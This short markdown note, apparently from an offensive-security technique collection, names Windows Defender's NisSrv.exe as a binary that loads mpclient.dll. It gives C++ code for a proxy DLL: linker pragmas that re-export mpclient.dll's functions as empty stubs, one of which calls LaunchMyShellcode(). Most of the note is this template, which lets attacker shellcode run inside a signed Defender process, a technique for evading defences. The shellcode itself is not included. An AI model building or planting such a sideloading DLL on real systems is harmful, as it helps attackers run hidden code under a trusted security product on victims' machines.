## Target

- `%ProgramFiles%\Windows Defender\NisSrv.exe` loads `mpclient.dll`

## Exports

```cpp
    
#pragma comment (linker, "/EXPORT:MpConfigClose=my_MpConfigClose")
#pragma comment (linker, "/EXPORT:MpConfigGetValueAlloc=my_MpConfigGetValueAlloc")
#pragma comment (linker, "/EXPORT:MpHandleClose=my_MpHandleClose")
#pragma comment (linker, "/EXPORT:MpNotificationRegister=my_MpNotificationRegister")
#pragma comment (linker, "/EXPORT:MpManagerOpen=my_MpManagerOpen")
#pragma comment (linker, "/EXPORT:MpFreeMemory=my_MpFreeMemory")
#pragma comment (linker, "/EXPORT:MpConfigUninitialize=my_MpConfigUninitialize")
#pragma comment (linker, "/EXPORT:MpConfigOpen=my_MpConfigOpen")
#pragma comment (linker, "/EXPORT:MpConfigInitialize=my_MpConfigInitialize")
#pragma comment (linker, "/EXPORT:MpClientUtilExportFunctions=my_MpClientUtilExportFunctions")
#pragma comment (linker, "/EXPORT:MpUtilsExportFunctions=my_MpUtilsExportFunctions")

extern "C" {
    void CALLBACK my_MpConfigClose()
    {
    }

    void CALLBACK my_MpConfigGetValueAlloc()
    {
    }

    void CALLBACK my_MpHandleClose()
    {
    }

    void CALLBACK my_MpNotificationRegister()
    {
    }

    void CALLBACK my_MpManagerOpen()
    {
    }

    void CALLBACK my_MpFreeMemory()
    {
    }

    void CALLBACK my_MpConfigUninitialize()
    {
    }

    void CALLBACK my_MpConfigOpen()
    {
    }

    void CALLBACK my_MpConfigInitialize()
    {
    }

    void CALLBACK my_MpClientUtilExportFunctions()
    {
    }

    void CALLBACK my_MpUtilsExportFunctions()
    { 
        LaunchMyShellcode();
    }

}
```

## Source

- [Sh0ck / @Sh0ckFR](https://twitter.com/Sh0ckFR/status/1554021948967079936)
- [my gist](https://gist.github.com/mgeeky/d8229940c45c27c1faba14fab55ca7ee)